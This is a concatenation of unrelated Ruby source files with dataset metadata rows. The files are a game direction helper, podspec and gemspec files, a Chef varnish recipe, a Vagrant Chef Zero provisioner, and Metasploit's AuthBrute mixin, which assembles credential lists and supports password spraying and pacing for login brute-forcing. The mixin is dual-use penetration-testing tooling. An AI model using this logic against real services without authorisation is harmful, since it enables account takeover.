SOUTH = [0, 1]
EAST = [1, 0]
WEST = [-1, 0]
STILL = [0, 0]
# Returns all contained items in each cardinal
# :return: An array of cardinals
def self.all_cardinals
return [NORTH, SOUTH, EAST, WEST]
end
# Converts from this direction tuple notation to the engine's string notation
# :param direction: the direction in this notation
# :return: The character equivalent for the game engine
def self.convert(direction)
case direction
when NORTH
return Commands::NORTH
when SOUTH
return Commands::SOUTH
when EAST
return Commands::EAST
when WEST
return Commands::WEST
when STILL
return Commands::STAY_STILL
else
raise IndexError
end
end
# Returns the opposite cardinal direction given a direction
# :param direction: The input direction
# :return: The opposite direction
def self.invert(direction)
case direction
when NORTH
return SOUTH
when SOUTH
return NORTH
when EAST
return WEST
when WEST
return EAST
when STILL
return STILL
else
raise IndexError
end
end
end
| 21.568966 | 79 | 0.670663 |
6a9e42a2b1ea9b99fbe8a4d2e829262943a842a7 | 1,534 | Pod::Spec.new do |s|
s.name = "SGLog"
s.version = "0.0.4"
s.summary = "ObjectiveC logging macros"
s.description = <<-DESC
SGLog is a macro based logger which allows you to embed significant logging code in your
projects. You can categorize your log messages and write them out conditionally. Finally when
you are ready to ship, all of your logging messages are compiled out of your archive protecting
your proprietary info and preventing your app from spamming the iOS console.
DESC
s.homepage = "https://github.com/danloughney/SGLog"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Daniel Loughney" => "[email protected]" }
s.social_media_url = 'http://twitter.com/dcloughney'
s.platform = :ios
s.ios.deployment_target = '8.0'
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
s.source = { :git => "https://github.com/danloughney/SGLog.git", :tag => "0.0.4" }
s.source_files = "Classes", "SGLog/*.{h,m}"
s.public_header_files = "SGLog/*.h"
s.framework = "UIKit"
s.requires_arc = true
# s.exclude_files = "Classes/Exclude"
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
end
| 51.133333 | 105 | 0.552151 |
e8c8205946c0d87f05bb03a1396338c56e9a55da | 1,728 | # Cookbook Name:: varnish
# Recipe:: default
# Author:: Joe Williams <[email protected]>
# Contributor:: Patrick Connolly <[email protected]>
#
# Copyright 2008-2009, Joe Williams
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
include_recipe 'varnish::repo' if node['varnish']['use_default_repo']
package 'varnish'
template "#{node['varnish']['dir']}/#{node['varnish']['vcl_conf']}" do
source node['varnish']['vcl_source']
cookbook node['varnish']['vcl_cookbook']
owner 'root'
group 'root'
mode 0644
notifies :reload, 'service[varnish]', :delayed
only_if { node['varnish']['vcl_generated'] == true }
end
template node['varnish']['default'] do
source node['varnish']['conf_source']
cookbook node['varnish']['conf_cookbook']
owner 'root'
group 'root'
mode 0644
notifies 'restart', 'service[varnish]', :delayed
end
service 'varnish' do
supports restart: true, reload: true
action %w(enable)
end
service 'varnishlog' do
supports restart: true, reload: true
action node['varnish']['log_daemon'] ? %w(enable start) : %w(disable stop)
end
service 'varnishncsa' do
supports restart: true, reload: true
action node['varnish']['ncsa_daemon'] ? %w(enable start) : %w(disable stop)
end
| 29.793103 | 77 | 0.720486 |
d5fdb642a88578722f8b1ed4cf8bf8a0fda23d34 | 1,780 | # -*- ruby -*-
# encoding: utf-8
require File.expand_path("lib/google/area120/tables/v1alpha1/version", __dir__)
Gem::Specification.new do |gem|
gem.name = "google-area120-tables-v1alpha1"
gem.version = Google::Area120::Tables::V1alpha1::VERSION
gem.authors = ["Google LLC"]
gem.email = "[email protected]"
gem.description = "Using the Area 120 Tables API, you can query for tables, and update/create/delete rows within tables programmatically. Note that google-area120-tables-v1alpha1 is a version-specific client library. For most uses, we recommend installing the main client library google-area120-tables instead. See the readme for more details."
gem.summary = "API Client library for the Area 120 Tables V1alpha1 API"
gem.homepage = "https://github.com/googleapis/google-cloud-ruby"
gem.license = "Apache-2.0"
gem.platform = Gem::Platform::RUBY
gem.files = `git ls-files -- lib/*`.split("\n") +
`git ls-files -- proto_docs/*`.split("\n") +
["README.md", "LICENSE.md", "AUTHENTICATION.md", ".yardopts"]
gem.require_paths = ["lib"]
gem.required_ruby_version = ">= 2.5"
gem.add_dependency "gapic-common", ">= 0.5", "< 2.a"
gem.add_dependency "google-cloud-errors", "~> 1.0"
gem.add_development_dependency "google-style", "~> 1.25.1"
gem.add_development_dependency "minitest", "~> 5.14"
gem.add_development_dependency "minitest-focus", "~> 1.1"
gem.add_development_dependency "minitest-rg", "~> 5.2"
gem.add_development_dependency "rake", ">= 12.0"
gem.add_development_dependency "redcarpet", "~> 3.0"
gem.add_development_dependency "simplecov", "~> 0.18"
gem.add_development_dependency "yard", "~> 0.9"
end
| 46.842105 | 348 | 0.674157 |
e82f91f08767d45602ae5790b909c897ece6c622 | 25,837 | # -*- coding: binary -*-
module Msf
###
#
# This module provides methods for brute forcing authentication
#
###
module Auxiliary::AuthBrute
def initialize(info = {})
super
register_options([
OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]),
OptPath.new('USER_FILE', [ false, "File containing usernames, one per line" ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line" ]),
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line" ]),
OptInt.new('BRUTEFORCE_SPEED', [ true, "How fast to bruteforce, from 0 to 5", 5]),
OptBool.new('VERBOSE', [ true, "Whether to print output for all attempts", true]),
OptBool.new('BLANK_PASSWORDS', [ false, "Try blank passwords for all users", false]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
OptBool.new('DB_ALL_CREDS', [false,"Try each user/password couple stored in the current database",false]),
OptBool.new('DB_ALL_USERS', [false,"Add all users in the current database to the list",false]),
OptBool.new('DB_ALL_PASS', [false,"Add all passwords in the current database to the list",false]),
OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", false]),
], Auxiliary::AuthBrute)
register_advanced_options([
OptBool.new('REMOVE_USER_FILE', [ true, "Automatically delete the USER_FILE on module completion", false]),
OptBool.new('REMOVE_PASS_FILE', [ true, "Automatically delete the PASS_FILE on module completion", false]),
OptBool.new('REMOVE_USERPASS_FILE', [ true, "Automatically delete the USERPASS_FILE on module completion", false]),
OptBool.new('PASSWORD_SPRAY', [true, "Reverse the credential pairing order. For each password, attempt every possible user.", false]),
OptInt.new('TRANSITION_DELAY', [false, "Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)", 0]),
OptInt.new('MaxGuessesPerService', [ false, "Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.", 0]), # Tracked in @@guesses_per_service
OptInt.new('MaxMinutesPerService', [ false, "Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.", 0]), # Tracked in @@brute_start_time
OptInt.new('MaxGuessesPerUser', [ false, %q{
Maximum guesses for a particular username for the service instance.
Note that users are considered unique among different services, so a
user at 10.1.1.1:22 is different from one at 10.2.2.2:22, and both will
be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number,
this option will not be used.}.gsub(/[\t\r\n\s]+/nm,"\s"), 0]) # Tracked in @@brute_start_time
], Auxiliary::AuthBrute)
end
def setup
@@max_per_service = nil
end
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
# a private type of 'ntlm_hash'
#
# @yieldparam [Metasploit::Credential::Core]
def each_ntlm_cred
creds = Metasploit::Credential::Core.joins(:private).where(metasploit_credential_privates: { type: 'Metasploit::Credential::NTLMHash' }, workspace_id: myworkspace.id)
creds.each do |cred|
yield cred
end
end
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
# a private type of 'password'
#
# @yieldparam [Metasploit::Credential::Core]
def each_password_cred
creds = Metasploit::Credential::Core.joins(:private).where(metasploit_credential_privates: { type: 'Metasploit::Credential::Password' }, workspace_id: myworkspace.id)
creds.each do |cred|
yield cred
end
end
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
# a private type of 'ssh_key'
#
# @yieldparam [Metasploit::Credential::Core]
def each_ssh_cred
creds = Metasploit::Credential::Core.joins(:private).where(metasploit_credential_privates: { type: 'Metasploit::Credential::SSHKey' }, workspace_id: myworkspace.id)
creds.each do |cred|
yield cred
end
end
# Checks whether we should be adding creds from the DB to a CredCollection
#
# @return [TrueClass] if any of the datastore options for db creds are selected and the db is active
# @return [FalseClass] if none of the datastore options are selected OR the db is not active
def prepend_db_creds?
(datastore['DB_ALL_CREDS'] || datastore['DB_ALL_PASS'] || datastore['DB_ALL_USERS']) && framework.db.active
end
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing NTLMHashes
# from the database. This allows the users to use the DB_ALL_CREDS option.
#
# @param cred_collection [Metasploit::Framework::CredentialCollection]
# the credential collection to add to
# @return [Metasploit::Framework::CredentialCollection] the modified Credentialcollection
def prepend_db_hashes(cred_collection)
if prepend_db_creds?
each_ntlm_cred do |cred|
process_cred_for_collection(cred_collection,cred)
end
end
cred_collection
end
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing SSHKeys
# from the database. This allows the users to use the DB_ALL_CREDS option.
#
# @param [Metasploit::Framework::CredentialCollection] cred_collection
# the credential collection to add to
# @return [Metasploit::Framework::CredentialCollection] cred_collection the modified Credentialcollection
def prepend_db_keys(cred_collection)
if prepend_db_creds?
each_ssh_cred do |cred|
process_cred_for_collection(cred_collection,cred)
end
end
cred_collection
end
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing Password Credentials
# from the database. This allows the users to use the DB_ALL_CREDS option.
#
# @param cred_collection [Metasploit::Framework::CredentialCollection]
# the credential collection to add to
# @return [Metasploit::Framework::CredentialCollection] the modified Credentialcollection
def prepend_db_passwords(cred_collection)
if prepend_db_creds?
each_password_cred do |cred|
process_cred_for_collection(cred_collection,cred)
end
end
cred_collection
end
# Takes a Metasploit::Credential::Core and converts it into a
# Metasploit::Framework::Credential and processes it into the
# Metasploit::Framework::CredentialCollection as dictated by the
# selected datastore options.
#
# @param [Metasploit::Framework::CredentialCollection] cred_collection the credential collection to add to
# @param [Metasploit::Credential::Core] cred the credential to process
def process_cred_for_collection(cred_collection, cred)
msf_cred = cred.to_credential
cred_collection.prepend_cred(msf_cred) if datastore['DB_ALL_CREDS']
cred_collection.add_private(msf_cred.private) if datastore['DB_ALL_PASS']
cred_collection.add_public(msf_cred.public) if datastore['DB_ALL_USERS']
end
# Checks all three files for usernames and passwords, and combines them into
# one credential list to apply against the supplied block. The block (usually
# something like do_login(user,pass) ) is responsible for actually recording
# success and failure in its own way; each_user_pass() will only respond to
# a return value of :done (which will signal to end all processing) and
# to :next_user (which will cause that username to be skipped for subsequent
# password guesses). Other return values won't affect the processing of the
# list.
#
# The 'noconn' argument should be set to true if each_user_pass is merely
# iterating over the usernames and passwords and should not respect
# bruteforce_speed as a delaying factor.
def each_user_pass(noconn=false,&block)
this_service = [datastore['RHOST'],datastore['RPORT']].join(":")
fq_rest = [this_service,"all remaining users"].join(":")
# This should kinda halfway be in setup, halfway in run... need to
# revisit this.
unless credentials ||= false # Assignment and comparison!
credentials ||= build_credentials_array()
credentials = adjust_credentials_by_max_user(credentials)
this_service = [datastore['RHOST'],datastore['RPORT']].join(":")
initialize_class_variables(this_service,credentials)
end
prev_iterator = nil
credentials.each do |u, p|
# Explicitly be able to set a blank (zero-byte) username by setting the
# username to <BLANK>. It's up to the caller to handle this if it's not
# allowed or if there's any special handling needed (such as smb_login).
u = "" if u =~ /^<BLANK>$/i
break if @@credentials_skipped[fq_rest]
fq_user = [this_service,u].join(":")
# Set noconn to indicate that in this case, each_user_pass
# is not actually kicking off a connection, so the
# bruteforce_speed datastore should be ignored.
if not noconn
userpass_sleep_interval unless @@credentials_tried.empty?
end
next if @@credentials_skipped[fq_user]
next if @@credentials_tried[fq_user] == p
# Used for tracking if we should TRANSITION_DELAY
# If the current user/password values don't match the previous iteration we know
# we've made it through all of the records for that iteration and should start the delay.
if ![u,p].include?(prev_iterator)
unless prev_iterator.nil? # Prevents a delay on the first run through
if datastore['TRANSITION_DELAY'] > 0
vprint_status("Delaying #{datastore['TRANSITION_DELAY']} minutes before attempting next iteration.")
sleep datastore['TRANSITION_DELAY'] * 60
end
end
prev_iterator = datastore['PASSWORD_SPRAY'] ? p : u # Update the iterator
end
ret = block.call(u, p)
case ret
when :abort # Skip the current host entirely.
abort_msg = {
:level => :error,
:ip => datastore['RHOST'],
:port => datastore['RPORT'],
:msg => "Bruteforce cancelled against this service."
}
unless datastore['VERBOSE']
abort_msg[:msg] << " Enable verbose output for service-specific details."
end
print_brute abort_msg
break
when :next_user # This means success for that user.
@@credentials_skipped[fq_user] = p
if datastore['STOP_ON_SUCCESS'] # See?
@@credentials_skipped[fq_rest] = true
end
when :skip_user # Skip the user in non-success cases.
@@credentials_skipped[fq_user] = p
when :connection_error # Report an error, skip this cred, but don't neccisarily abort.
print_brute(
:level => :verror,
:ip => datastore['RHOST'],
:port => datastore['RPORT'],
:msg => "Connection error, skipping '#{u}':'#{p}'")
end
@@guesses_per_service[this_service] ||= 1
@@credentials_tried[fq_user] = p
if counters_expired? this_service,credentials
break
else
@@guesses_per_service[this_service] += 1
end
end
end
def counters_expired?(this_service,credentials)
expired_cred = false
expired_time = false
# Workaround for cases where multiple auth_brute modules are running concurrently and
# someone stomps on the @max_per_service class variable during setup.
current_max_per_service = self.class.class_variable_get("@@max_per_service") rescue nil
return false unless current_max_per_service
if @@guesses_per_service[this_service] >= (@@max_per_service)
if @@max_per_service < credentials.size
print_brute(
:level => :vstatus,
:ip => datastore['RHOST'],
:port => datastore['RPORT'],
:msg => "Hit maximum guesses for this service (#{@@max_per_service}).")
expired_cred = true
end
end
seconds_to_run = datastore['MaxMinutesPerService'].to_i.abs * 60
if seconds_to_run > 0
if Time.now.utc.to_i > @@brute_start_time.to_i + seconds_to_run
print_brute(
:level => :vstatus,
:ip => datastore['RHOST'],
:port => datastore['RPORT'],
:msg => "Hit timeout for this service at #{seconds_to_run / 60}m.")
expired_time = true
end
end
expired_cred || expired_time
end
# If the user passed a memory location for credential gen, assume
# that that's precisely what's desired -- no other transforms or
# additions or uniqueness should be done. Otherwise, perform
# the usual alterations.
def build_credentials_array
credentials = extract_word_pair(datastore['USERPASS_FILE'])
translate_proto_datastores()
return credentials if datastore['USERPASS_FILE'] =~ /^memory:/
users = load_user_vars(credentials)
passwords = load_password_vars(credentials)
cleanup_files()
if datastore['USER_AS_PASS']
credentials = gen_user_as_password(users, credentials)
end
if datastore['BLANK_PASSWORDS']
credentials = gen_blank_passwords(users, credentials)
end
if framework.db.active
if datastore['DB_ALL_CREDS']
myworkspace.creds.each do |o|
credentials << [o.user, o.pass] if o.ptype =~ /password/
end
end
if datastore['DB_ALL_USERS']
myworkspace.creds.each do |o|
users << o.user
end
end
if datastore['DB_ALL_PASS']
myworkspace.creds.each do |o|
passwords << o.pass if o.ptype =~ /password/
end
end
end
credentials.concat(combine_users_and_passwords(users, passwords))
credentials.uniq!
credentials = just_uniq_users(credentials) if @strip_passwords
credentials = just_uniq_passwords(credentials) if @strip_usernames
return credentials
end
# Class variables to track credential use. They need
# to be class variables due to threading.
def initialize_class_variables(this_service,credentials)
@@guesses_per_service ||= {}
@@guesses_per_service[this_service] = nil
@@credentials_skipped = {}
@@credentials_tried = {}
@@guesses_per_service = {}
if datastore['MaxGuessesPerService'].to_i.abs == 0
@@max_per_service = credentials.size
else
if datastore['MaxGuessesPerService'].to_i.abs >= credentials.size
@@max_per_service = credentials.size
print_brute(
:level => :vstatus,
:ip => datastore['RHOST'],
:port => datastore['RPORT'],
:msg => "Adjusting MaxGuessesPerService to the actual total number of credentials")
else
@@max_per_service = datastore['MaxGuessesPerService'].to_i.abs
end
end
unless datastore['MaxMinutesPerService'].to_i.abs == 0
@@brute_start_time = Time.now.utc
end
end
def load_user_vars(credentials = nil)
users = extract_words(datastore['USER_FILE'])
if datastore['USERNAME']
users.unshift datastore['USERNAME']
credentials = prepend_chosen_username(datastore['USERNAME'], credentials) if credentials
end
users
end
def load_password_vars(credentials = nil)
passwords = extract_words(datastore['PASS_FILE'])
if datastore['PASSWORD']
passwords.unshift datastore['PASSWORD']
credentials = prepend_chosen_password(datastore['PASSWORD'], credentials) if credentials
end
passwords
end
# Takes protocol-specific username and password fields, and,
# if present, prefer those over any given USERNAME or PASSWORD.
# Note, these special username/passwords should get deprecated
# some day. Note2: Don't use with SMB and FTP at the same time!
def translate_proto_datastores
['SMBUser','FTPUSER'].each do |u|
if datastore[u] and !datastore[u].empty?
datastore['USERNAME'] = datastore[u]
end
end
['SMBPass','FTPPASS'].each do |p|
if datastore[p] and !datastore[p].empty?
datastore['PASSWORD'] = datastore[p]
end
end
end
def just_uniq_users(credentials)
credentials.map {|x| [x[0],""]}.uniq
end
def just_uniq_passwords(credentials)
credentials.map{|x| ["",x[1]]}.uniq
end
def prepend_chosen_username(user,cred_array)
cred_array.map {|pair| [user,pair[1]]} + cred_array
end
def prepend_chosen_password(pass,cred_array)
cred_array.map {|pair| [pair[0],pass]} + cred_array
end
def gen_blank_passwords(user_array,cred_array)
blank_passwords = []
unless user_array.empty?
blank_passwords.concat(user_array.map {|u| [u,""]})
end
unless cred_array.empty?
cred_array.each {|u,p| blank_passwords << [u,""]}
end
return(blank_passwords + cred_array)
end
def gen_user_as_password(user_array,cred_array)
user_as_passwords = []
unless user_array.empty?
user_as_passwords.concat(user_array.map {|u| [u,u]})
end
unless cred_array.empty?
cred_array.each {|u,p| user_as_passwords << [u,u]}
end
return(user_as_passwords + cred_array)
end
def combine_users_and_passwords(user_array,pass_array)
if (user_array.length + pass_array.length) < 1
return []
end
combined_array = []
if pass_array.empty?
combined_array = user_array.map {|u| [u,""] }
elsif user_array.empty?
combined_array = pass_array.map {|p| ["",p] }
else
if datastore['PASSWORD_SPRAY']
pass_array.each do |p|
user_array.each do |u|
combined_array << [u,p]
end
end
else
user_array.each do |u|
pass_array.each do |p|
combined_array << [u,p]
end
end
end
end
creds = [ [], [], [], [] ] # userpass, pass, user, rest
remaining_pairs = combined_array.length # counter for our occasional output
interval = 60 # seconds between each remaining pair message reported to user
next_message_time = Time.now + interval # initial timing interval for user message
# Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list.
# Note that we cannot tell the user intention if USERNAME or PASSWORD is blank --
# maybe (and it's often) they wanted a blank. One more credential won't kill
# anyone, and hey, won't they be lucky if blank user/blank pass actually works!
combined_array.each do |pair|
if pair == [datastore['USERNAME'],datastore['PASSWORD']]
creds[0] << pair
elsif pair[1] == datastore['PASSWORD']
creds[1] << pair
elsif pair[0] == datastore['USERNAME']
creds[2] << pair
else
creds[3] << pair
end
if Time.now > next_message_time
print_brute(
:level => :vstatus,
:msg => "Pair list is still building with #{remaining_pairs} pairs left to process"
)
next_message_time = Time.now + interval
end
remaining_pairs -= 1
end
return creds[0] + creds[1] + creds[2] + creds[3]
end
def extract_words(wordfile)
return [] unless wordfile && File.readable?(wordfile)
begin
words = File.open(wordfile) {|f| f.read(f.stat.size)}
rescue
return
end
save_array = words.split(/\r?\n/)
return save_array
end
def get_object_from_memory_location(memloc)
if memloc.to_s =~ /^memory:\s*([0-9]+)/
id = $1
ObjectSpace._id2ref(id.to_s.to_i)
end
end
def extract_word_pair(wordfile)
creds = []
if wordfile.to_s =~ /^memory:/
return extract_word_pair_from_memory(wordfile.to_s)
else
return [] unless wordfile && File.readable?(wordfile)
begin
upfile_contents = File.open(wordfile) {|f| f.read(f.stat.size)}
rescue
return []
end
upfile_contents.split(/\n/).each do |line|
user,pass = line.split(/\s+/,2).map { |x| x.strip }
creds << [user.to_s, pass.to_s]
end
return creds
end
end
def extract_word_pair_from_memory(memloc)
begin
creds = []
obj = get_object_from_memory_location(memloc)
unless obj.all_creds.empty?
these_creds = obj.all_creds
else
these_creds = obj.builders.select {|x| x.respond_to? :imported_users}.map {|b| b.imported_users}.flatten
end
these_creds.each do |cred|
if @strip_passwords
user = cred.split(/\s+/,2).map {|x| x.strip}[0]
pass = ""
elsif @strip_usernames
user = ""
pass = cred.split(/\s+/,2).map {|x| x.strip}[1]
else
user,pass = cred.split(/\s+/,2).map {|x| x.strip}
end
creds << [Rex::Text.dehex(user.to_s), Rex::Text.dehex(pass.to_s)]
end
if @strip_passwords || @strip_usernames
return creds.uniq
else
return creds
end
rescue => e
raise ArgumentError, "Could not read credentials from memory, raised: #{e.class}: #{e.message}"
end
end
def userpass_interval
case datastore['BRUTEFORCE_SPEED'].to_i
when 0; 60 * 5
when 1; 15
when 2; 1
when 3; 0.5
when 4; 0.1
else; 0
end
end
def userpass_sleep_interval
::IO.select(nil,nil,nil,userpass_interval) unless userpass_interval == 0
end
# See #print_brute
def vprint_brute(opts={})
if datastore['VERBOSE']
print_brute(opts)
end
end
def vprint_status(msg='')
print_brute :level => :vstatus, :msg => msg
end
def vprint_error(msg='')
print_brute :level => :verror, :msg => msg
end
alias_method :vprint_bad, :vprint_error
def vprint_good(msg='')
print_brute :level => :vgood, :msg => msg
end
# Provides a consistant way to display messages about AuthBrute-mixed modules.
# Acceptable opts are fairly self-explanatory, but :level can be tricky.
#
# It can be one of status, good, error, or line (and corresponds to the usual
# print_status, print_good, etc. methods).
#
# If it's preceded by a "v" (ie, vgood, verror, etc), only print if
# datastore["VERBOSE"] is set to true.
#
# If :level would make the method nonsense, default to print_status.
#
# TODO: This needs to be simpler to be useful.
def print_brute(opts={})
if opts[:level] and opts[:level].to_s[/^v/]
return unless datastore["VERBOSE"]
level = opts[:level].to_s[1,16].strip
else
level = opts[:level].to_s.strip
end
host_ip = opts[:ip] || opts[:rhost] || opts[:host] || (rhost rescue nil) || datastore['RHOST']
host_port = opts[:port] || opts[:rport] || (rport rescue nil) || datastore['RPORT']
msg = opts[:msg] || opts[:message]
proto = opts[:proto] || opts[:protocol] || proto_from_fullname
complete_message = build_brute_message(host_ip,host_port,proto,msg)
print_method = "print_#{level}"
if self.respond_to? print_method
self.send print_method, complete_message
else
print_status complete_message
end
end
# Depending on the non-nil elements, build up a standardized
# auth_brute message.
def build_brute_message(host_ip,host_port,proto,msg)
ip = host_ip.to_s.strip if host_ip
port = host_port.to_s.strip if host_port
complete_message = nil
old_msg = msg.to_s.strip
msg_regex = /(#{ip})(:#{port})?(\s*-?\s*)(#{proto.to_s})?(\s*-?\s*)(.*)/ni
if old_msg.match(msg_regex)
complete_message = msg.to_s.strip
else
complete_message = ''
unless ip.blank? && port.blank?
complete_message << "#{ip}:#{port}"
else
complete_message << proto || 'Bruteforce'
end
complete_message << " - "
progress = tried_over_total(ip,port)
complete_message << progress if progress
complete_message << msg.to_s.strip
end
end
# Takes a credentials array, and returns just the first X involving
# a particular user.
def adjust_credentials_by_max_user(credentials)
max = datastore['MaxGuessesPerUser'].to_i.abs
if max == 0
new_credentials = credentials
else
print_brute(
:level => :vstatus,
:msg => "Adjusting credentials by MaxGuessesPerUser (#{max})"
)
user_count = {}
new_credentials = []
credentials.each do |u,p|
user_count[u] ||= 0
user_count[u] += 1
next if user_count[u] > max
new_credentials << [u,p]
end
end
return new_credentials
end
# Fun trick: Only prints if we're already in each_user_pass, since
# only then is @@max_per_service defined.
def tried_over_total(ip,port)
total = self.class.class_variable_get("@@max_per_service") rescue nil
return unless total
total = total.to_i
current_try = (@@guesses_per_service["#{ip}:#{port}"] || 1).to_i
pad = total.to_s.size
"[%0#{pad}d/%0#{pad}d] - " % [current_try, total]
end
# Protocols can nearly always be automatically determined from the
# name of the module, assuming the name is sensible like ssh_login or
# smb_auth.
def proto_from_fullname
File.split(self.fullname).last.match(/^(.*)_(login|auth|identify)/)[1].upcase rescue nil
end
# This method deletes the dictionary files if requested
def cleanup_files
path = datastore['USERPASS_FILE']
if path and datastore['REMOVE_USERPASS_FILE']
::File.unlink(path) rescue nil
end
path = datastore['USER_FILE']
if path and datastore['REMOVE_USER_FILE']
::File.unlink(path) rescue nil
end
path = datastore['PASS_FILE']
if path and datastore['REMOVE_PASS_FILE']
::File.unlink(path) rescue nil
end
end
end
end
| 36.338959 | 213 | 0.672446 |
1a63be73f39cc52c74e99e2a4d6db935ada47a16 | 7,789 | require "digest/md5"
require "securerandom"
require "set"
require "log4r"
require "vagrant/util/counter"
require_relative "base"
module VagrantPlugins
module Chef
module Provisioner
# This class implements provisioning via chef-zero.
class ChefZero < Base
extend Vagrant::Util::Counter
include Vagrant::Util::Counter
include Vagrant::Action::Builtin::MixinSyncedFolders
attr_reader :environments_folders
attr_reader :cookbook_folders
attr_reader :role_folders
attr_reader :data_bags_folders
def initialize(machine, config)
super
@logger = Log4r::Logger.new("vagrant::provisioners::chef_zero")
@shared_folders = []
end
def configure(root_config)
@cookbook_folders = expanded_folders(@config.cookbooks_path, "cookbooks")
@role_folders = expanded_folders(@config.roles_path, "roles")
@data_bags_folders = expanded_folders(@config.data_bags_path, "data_bags")
@environments_folders = expanded_folders(@config.environments_path, "environments")
existing = synced_folders(@machine, cached: true)
share_folders(root_config, "csc", @cookbook_folders, existing)
share_folders(root_config, "csr", @role_folders, existing)
share_folders(root_config, "csdb", @data_bags_folders, existing)
share_folders(root_config, "cse", @environments_folders, existing)
end
def provision(mode = :client)
install_chef
# Verify that the proper shared folders exist.
check = []
@shared_folders.each do |type, local_path, remote_path|
# We only care about checking folders that have a local path, meaning
# they were shared from the local machine, rather than assumed to
# exist on the VM.
check << remote_path if local_path
end
chown_provisioning_folder
verify_shared_folders(check)
verify_binary(chef_binary_path("chef-client"))
upload_encrypted_data_bag_secret
setup_json
setup_zero_config
run_chef(mode)
delete_encrypted_data_bag_secret
end
# Converts paths to a list of properly expanded paths with types.
def expanded_folders(paths, appended_folder=nil)
# Convert the path to an array if it is a string or just a single
# path element which contains the folder location (:host or :vm)
paths = [paths] if paths.is_a?(String) || paths.first.is_a?(Symbol)
results = []
paths.each do |type, path|
# Create the local/remote path based on whether this is a host
# or VM path.
local_path = nil
remote_path = nil
if type == :host
# Get the expanded path that the host path points to
local_path = File.expand_path(path, @machine.env.root_path)
if File.exist?(local_path)
# Path exists on the host, setup the remote path. We use
# the MD5 of the local path so that it is predictable.
key = Digest::MD5.hexdigest(local_path)
remote_path = "#{@config.provisioning_path}/#{key}"
else
@machine.ui.warn(I18n.t("vagrant.provisioners.chef.cookbook_folder_not_found_warning",
path: local_path.to_s))
next
end
else
# Path already exists on the virtual machine. Expand it
# relative to where we're provisioning.
remote_path = File.expand_path(path, @config.provisioning_path)
# Remove drive letter if running on a windows host. This is a bit
# of a hack but is the most portable way I can think of at the moment
# to achieve this. Otherwise, Vagrant attempts to share at some crazy
# path like /home/vagrant/c:/foo/bar
remote_path = remote_path.gsub(/^[a-zA-Z]:/, "")
end
# If we have specified a folder name to append then append it
remote_path += "/#{appended_folder}" if appended_folder
# Append the result
results << [type, local_path, remote_path]
end
results
end
# Shares the given folders with the given prefix. The folders should
# be of the structure resulting from the `expanded_folders` function.
def share_folders(root_config, prefix, folders, existing=nil)
existing_set = Set.new
(existing || []).each do |_, fs|
fs.each do |id, data|
existing_set.add(data[:guestpath])
end
end
folders.each do |type, local_path, remote_path|
next if type != :host
# If this folder already exists, then we don't share it, it means
# it was already put down on disk.
if existing_set.include?(remote_path)
@logger.debug("Not sharing #{local_path}, exists as #{remote_path}")
next
end
opts = {}
opts[:id] = "v-#{prefix}-#{self.class.get_and_update_counter(:shared_folder)}"
opts[:type] = @config.synced_folder_type if @config.synced_folder_type
root_config.vm.synced_folder(local_path, remote_path, opts)
end
@shared_folders += folders
end
def setup_zero_config
setup_config("provisioners/chef_zero/zero", "client.rb", {
local_mode: true,
enable_reporting: false,
cookbooks_path: guest_paths(@cookbook_folders),
roles_path: guest_paths(@role_folders),
data_bags_path: guest_paths(@data_bags_folders).first,
environments_path: guest_paths(@environments_folders).first,
})
end
def run_chef(mode)
if @config.run_list && @config.run_list.empty?
@machine.ui.warn(I18n.t("vagrant.chef_run_list_empty"))
end
if @machine.guest.capability?(:wait_for_reboot)
@machine.guest.capability(:wait_for_reboot)
end
command = build_command(:client)
@config.attempts.times do |attempt|
if attempt == 0
@machine.ui.info I18n.t("vagrant.provisioners.chef.running_#{mode}")
else
@machine.ui.info I18n.t("vagrant.provisioners.chef.running_#{mode}_again")
end
opts = { error_check: false, elevated: true }
exit_status = @machine.communicate.sudo(command, opts) do |type, data|
# Output the data with the proper color based on the stream.
color = type == :stdout ? :green : :red
data = data.chomp
next if data.empty?
@machine.ui.info(data, color: color)
end
# There is no need to run Chef again if it converges
return if exit_status == 0
end
# If we reached this point then Chef never converged! Error.
raise ChefError, :no_convergence
end
def verify_shared_folders(folders)
folders.each do |folder|
@logger.debug("Checking for shared folder: #{folder}")
if [email protected]("test -d #{folder}", sudo: true)
raise ChefError, :missing_shared_folders
end
end
end
protected
# Extracts only the remote paths from a list of folders
def guest_paths(folders)
folders.map { |parts| parts[2] }
end
end
end
end
end
| 37.090476 | 102 | 0.596482 |
28c820c74a941a41c79bf98f2fa2518a5faa366d | 1,543 | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'improved_jenkins_client/version'
Gem::Specification.new do |s|
s.name = "improved_jenkins_client"
s.version = ::JenkinsApi::Client::VERSION
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
